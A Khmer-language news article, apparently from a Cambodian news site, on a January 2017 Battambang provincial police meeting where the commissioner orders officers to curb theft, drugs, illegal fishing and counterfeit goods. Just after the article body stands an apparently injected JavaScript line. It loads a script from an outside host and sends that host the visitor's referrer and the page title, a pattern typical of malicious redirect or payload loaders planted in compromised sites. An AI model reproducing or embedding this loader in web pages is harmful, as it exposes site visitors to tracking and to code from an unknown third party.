Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

លោក ឧត្ដមសេនីយ៍​ ស​ ថេត​ បញ្ជាអោយមន្ត្រីក្រោមឱវាទ បន្ត​ ​បង្ការ​ទប់ស្កាត់​បទល្មើស​ និង​បង្ក្រាប​ឲ្យ​មាន​ប្រសិទ្ធ​ភាព​និង​តម្លាភាព

បាត់ដំបង​៖ ​ព្រឹក​ថ្ងៃ​ទី​២៣ខែមករា​ឆ្នាំ​២០១៧នេះ​នៅ​សាលប្រជុំ​ស្នងការ​ដ្ឋាន​នគរបាល​ខេត្ត​បាត់ដំបង​ មាន​រៀបចំ​កិច្ច​ប្រជុំ​ បូក​សរុប​សភាពការណ៍​និង​កិច្ច​ប្រតិបត្តិ​ការ​រក្សា​សន្តិសុខ​សណ្តាប់​ធ្នាប់​សង្គម​ប្រចាំ​ខែ​មករា​លើក​ទឹសដៅ​ភារកិច្ច​ខែ​កុម្ភៈ​នេះ​បន្ត​ ប្រព្រឹត្ត​ទៅ​ក្រោម​ វត្តមាន​ឯកឧត្ដម​ ស​ ថេត​ ស្នងការ​នគរបាល​ខេត្ត​ និង​មានការ​អញ្ជើញ​ចូលរួម​ពី​សំណាក់​លោក​នឹង​លោក​ស្រី​ជា​ថ្នាក់​ដឹក​នាំ​ស្នងការ​រង​ អស់​លោក​និង​លោក​ស្រី​កងកម្លាំង​ នគរបាល​សរុប​១២៩នាក់​។

​ បន្ទាប់​ពី​ឆ្លង​កាត់​របាយការណ៍​ពី​លោកវរសេនីយ៍​ ឯក​ សុខ​ តុលា​ ស្នងការ​រង​ទទួល​ផែន​ រដ្ឋ​បាលរួចមក​។
​ ឯកឧត្ដម​ ស​ ថេត​ ស្នងការ​ខេត្ត​ លោក​បាន​ដាក់​ចេញ​នូវ​ផែនការ​យុទ្ធសាស្ត្រ​ សំរាប់​ផែន​ប្រឆាំង​បទល្មើស​ ផែន​យុត្តិធម៌​ ផែន​សណ្តាប់​ធ្នាប់​ ការិយាល័យ​ជំនាញ​ អធិការ​ នាយប៉ុស្តិ៏​ ត្រូវ​ពង្រឹង​សមត្ថភាព​ជំនាញ​ សំណុំរឿង​ ប្រើប្រាស់​កម្លាំង​នគរបាល​ក្រោម​ឱវាទ​តាម​ឋានា នុក្រម​ បន្ត​ចុះ​បង្ការ​ទប់ស្កាត់​បទល្មើស​ និង​បង្ក្រាប​ ឲ្យ​មាន​ប្រសិទ្ធ​ភាព​និង​តម្លាភាព​។​ ក្នុង​នោះ​មាន​ក្រុម​ កាច់សោរ​ គាស់​ផ្ទះ​ ឆក់​ លួច​ ប្លន់​ ត្រូវ​ប្រើ​ប្រាស់​កម្លាំង​នគរបាល​ តាម​ប្រមាញ់​មុខ​សញ្ញា​ ពាក់ព័ន្ធ​ រួម​ទាំង​អនុវត្តន៍​ដីកា​ចាប់​ខ្លួន​ជន​សង្ស័យ​ សហការ​ប្រតិបត្តិ​ការ​ ជាមួយ​កម្លាំង​ពាក់ព័ន្ធ​ក្នុង​មូលដ្ឋាន​ធ្វើ​បច្ចុប្បន្ន​ភាព​ រាល់​ប្រជាពលរដ្ឋ​ដែល​ចំណាក​ស្រុក​ ក្នុង​មូលដ្ឋាន​គ្រប់គ្រង​និង​សកម្មភាព​អោយ​បាន​ត្រឹម​ត្រូវ​។​ ចំណែក​ក្រុម​ប្រឆាំង​បទល្មើស​ត្រូវ​ ជំរុញ​សកម្មភាព​ របស់​មន្ត្រី​ បង្ការ​ទប់ស្កាត់​បទល្មើស​ នេសាទ​ គ្រឿង​ញៀន​ ផលិតផល​ទំនិញ ​ក្លែងក្លាយ​ ប្រើ​ប្រាស់​សារធាតុ​គីមី​ដែល​ធ្វើ​ឲ្យ​ប៉ះ​ពាល់​ដល់​សុមារភាព​ សុខភាព​របស់​ប្រជាពលរដ្ឋ​។


មួយ​វិញ​ទៀត​ ផែន​សណ្តាប់​ធ្នាប់​សាធារណៈ​ មន្ត្រី​នគរបាល​ជំនាញ​ ត្រូវ​ចុះ​ផ្សព្វផ្សាយ​អំពី​ច្បាប់​ មាត្រា​ ចរាចរណ៍​ដល់​សិស្ស​ និស្សិត​ ប្រជាពលរដ្ឋ​ និង​ពេល​ដែល​ចុះ​អនុវត្តន៍​ភារកិច្ច​ត្រូវ​ប្រកាន់​ខ្ជាប់​នូវ​វិន័យ​របស់​កងកម្លំាង​នគរបាល​ និង​មិន​ធ្វើ​អ្វី​ឲ្យ​ប៉ះពាល់​ដល់​ផលប្រយោជន៍​របស់​ប្រជាពលរដ្ឋ​និង​សង្គម​ជាតិ​ឡើង​។

​ជាចុងក្រោយ​នេះ​ លោក​បាន​កោត​សរសើរ​និង​វាយ​តម្លៃ​ខ្ពស់​ចំពោះ​ស្នាដៃ​របស់​លោក​និង​លោក​ស្រី​ជា​ថ្នាក់​ដឹក​នាំ​ និង​មន្ត្រី​កង​កម្លាំង​នគរបាល​ ដែល​បាន​ការ​ពារ​ ថ្ថេរ​ភាព​ សុវត្ថិភាព​សណ្តាប់​ធ្នាប់​សាធារណៈ​ជូន​ប្រជាពលរដ្ឋ​រស់​នៅ​បាន​ស្រណុក​សុខ​ស្រួល​ប្រកបរបរ​រកស៊ី​បាន​ល្អ​។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More